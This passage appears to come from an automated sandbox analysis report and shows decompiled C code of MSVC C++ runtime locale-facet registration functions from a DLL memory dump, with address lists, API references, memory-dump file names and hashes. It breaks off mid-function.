0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64

APIs

__EH_prolog3.LIBCMT ref: 6D480F2D
std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 96bebdff1b39ae04b617b13c0cd01279103d6fe55d95ed549a8a23d982a6b1e9
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 96bebdff1b39ae04b617b13c0cd01279103d6fe55d95ed549a8a23d982a6b1e9
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;
				void* _t158;

				_t141 = __edx;
				_t110 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t154 - 0x14, 0);
				_t147 =  *0x6d53fde0; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6D451D10();
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6D476A77(_t154 - 0x14);
					return E6D490E67(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6D4829F6(__ebx, _t113, __edx, _t143, _t147, __eflags, _t158) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t154 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t143, _t147);
							E6D476A10(_t154 - 0x14, 0);
							_t148 =  *0x6d53fe14; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6D451D10();
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6D476A77(_t154 - 0x14);
								return E6D490E67(_t144);
							} else {
								__eflags = _t148;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6D482A62(_t110, _t120, __edx, _t144, _t148, __eflags, _t158) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t154 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t110, _t144, _t148);
										E6D476A10(_t154 - 0x14, 0);
										_t149 =  *0x6d53fde4; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6D451D10();
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6D476A77(_t154 - 0x14);
											return E6D490E67(_t145);
										} else {
											__eflags = _t149;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6D482AC8(_t110, _t127, __edx, _t145, _t149, __eflags, _t158) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6D451940();
													E6D4924F4(_t154 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(4);
													E6D490E9E(0x6d4fefbc, _t110, _t145, _t149);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_push( *((intOrPtr*)(_t154 + 8)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6d5041ac;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6D4868B7(_t110, _t131, _t141, _t145, _t150,  *_t49, _t158);
													return E6D490E67(_t150);
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6D478A0B(__eflags, _t145);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6d53fde4 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6D478A0B(__eflags, _t144);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6d53fe14 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6D478A0B(__eflags, _t143);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6d53fde0 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6d480fcc
0x6d480fcc
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d480ffd
0x6d481002
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a

APIs

__EH_prolog3.LIBCMT ref: 6D480FD3
std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 57aba7de2f5c2e9117eb2f176dc062e83fdf128e36b4587527588d5ec09a9ad3
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: 57aba7de2f5c2e9117eb2f176dc062e83fdf128e36b4587527588d5ec09a9ad3
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6D48CED0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;
				void* _t114;

				_t79 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t110 - 0x14, 0);
				_t105 =  *0x6d53fe4c; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6D451D10();
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6D452140( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6D476A77(_t110 - 0x14);
					return E6D490E67(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6D48D4BE(__ebx, _t82, __edx, _t102, _t105, __eflags, _t114) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t110 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t102, _t105);
							E6D476A10(_t110 - 0x14, 0);
							_t106 =  *0x6d53fe50; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6D451D10();
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6D452140( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6D476A77(_t110 - 0x14);
								return E6D490E67(_t103);
							} else {
								__eflags = _t106;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6D48D52A(__ebx, _t89, __edx, _t103, _t106, __eflags, _t114) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t110 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(4);
										E6D490E9E(0x6d4fefbc, _t79, _t103, _t106);
										_t107 = _t110 - 0x20;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_push( *((intOrPtr*)(_t110 + 8)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6d5044f4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6D48E2BD(_t79, _t110 - 0x20, __edx, _t103, _t107,  *_t35, _t114);
										return E6D490E67(_t107);
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6D478A0B(__eflags, _t103);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6d53fe50 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6D478A0B(__eflags, _t102);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6d53fe4c = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6d48ced0
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf01
0x6d48cf06
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e

APIs

__EH_prolog3.LIBCMT ref: 6D48CED7
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b7cde710ff2c6dce3f9ec87fe09201272574e6f5ae50f4baa670f6ffe1be09c1
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: b7cde710ff2c6dce3f9ec87fe09201272574e6f5ae50f4baa670f6ffe1be09c1
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480950(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;
				void* _t598;

				_t551 = __edx;
				_t420 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t594 - 0x14, 0);
				_t567 =  *0x6d53fdd4; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6D451D10();
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6D476A77(_t594 - 0x14);
					return E6D490E67(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6D48255D(__ebx, _t423, __edx, _t553, _t567, __eflags, _t598) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t594 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t553, _t567);
							E6D476A10(_t594 - 0x14, 0);
							_t568 =  *0x6d53fe0c; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6D451D10();
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6D476A77(_t594 - 0x14);
								return E6D490E67(_t554);
							} else {
								__eflags = _t568;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6D4825C5(_t420, _t430, __edx, _t554, _t568, __eflags, _t598) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t594 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t420, _t554, _t568);
										E6D476A10(_t594 - 0x14, 0);
										_t569 =  *0x6d53fe08; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6D451D10();
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6D476A77(_t594 - 0x14);
											return E6D490E67(_t555);
										} else {
											__eflags = _t569;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6D482649(_t420, _t437, __edx, _t555, _t569, __eflags, _t598) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t594 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t420, _t555, _t569);
													E6D476A10(_t594 - 0x14, 0);
													_t570 =  *0x6d53fddc; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6D451D10();
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6D476A77(_t594 - 0x14);
														return E6D490E67(_t556);
													} else {
														__eflags = _t570;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6D4826CE(_t420, _t444, _t551, _t556, _t570, __eflags, _t598) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t420, _t556, _t570);
																E6D476A10(_t594 - 0x14, 0);
																_t571 =  *0x6d53fdd8; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6D451D10();
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6D476A77(_t594 - 0x14);
																	return E6D490E67(_t557);
																} else {
																	__eflags = _t571;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6D482752(_t420, _t451, _t551, _t557, _t571, __eflags, _t598) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t420, _t557, _t571);
																			E6D476A10(_t594 - 0x14, 0);
																			_t572 =  *0x6d53fdec; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6D451D10();
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6D476A77(_t594 - 0x14);
																				return E6D490E67(_t558);
																			} else {
																				__eflags = _t572;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6D4827D7(_t420, _t458, _t551, _t558, _t572, __eflags, _t598) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t420, _t558, _t572);
																						E6D476A10(_t594 - 0x14, 0);
																						_t573 =  *0x6d53fdc4; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6D451D10();
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6D476A77(_t594 - 0x14);
																							return E6D490E67(_t559);
																						} else {
																							__eflags = _t573;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6D48283F(_t420, _t465, _t551, _t559, _t573, __eflags, _t598) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t420, _t559, _t573);
																									E6D476A10(_t594 - 0x14, 0);
																									_t574 =  *0x6d53fdf0; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6D451D10();
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6D476A77(_t594 - 0x14);
																										return E6D490E67(_t560);
																									} else {
																										__eflags = _t574;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6D4828A7(_t420, _t472, _t551, _t560, _t574, __eflags, _t598) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t420, _t560, _t574);
																												E6D476A10(_t594 - 0x14, 0);
																												_t575 =  *0x6d53fdf4; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6D451D10();
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6D476A77(_t594 - 0x14);
																													return E6D490E67(_t561);
																												} else {
																													__eflags = _t575;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6D48290F(_t420, _t479, _t551, _t561, _t575, __eflags, _t598) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t420, _t561, _t575);
																															E6D476A10(_t594 - 0x14, 0);
																															_t576 =  *0x6d53fe10; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6D451D10();
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6D476A77(_t594 - 0x14);
																																return E6D490E67(_t562);
																															} else {
																																__eflags = _t576;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6D48298A(_t420, _t486, _t551, _t562, _t576, __eflags, _t598) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t594 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t420, _t562, _t576);
																																		E6D476A10(_t594 - 0x14, 0);
																																		_t577 =  *0x6d53fde0; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6D451D10();
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6D452140( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6D476A77(_t594 - 0x14);
																																			return E6D490E67(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6D4829F6(_t420, _t493, _t551, _t563, _t577, __eflags, _t598) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
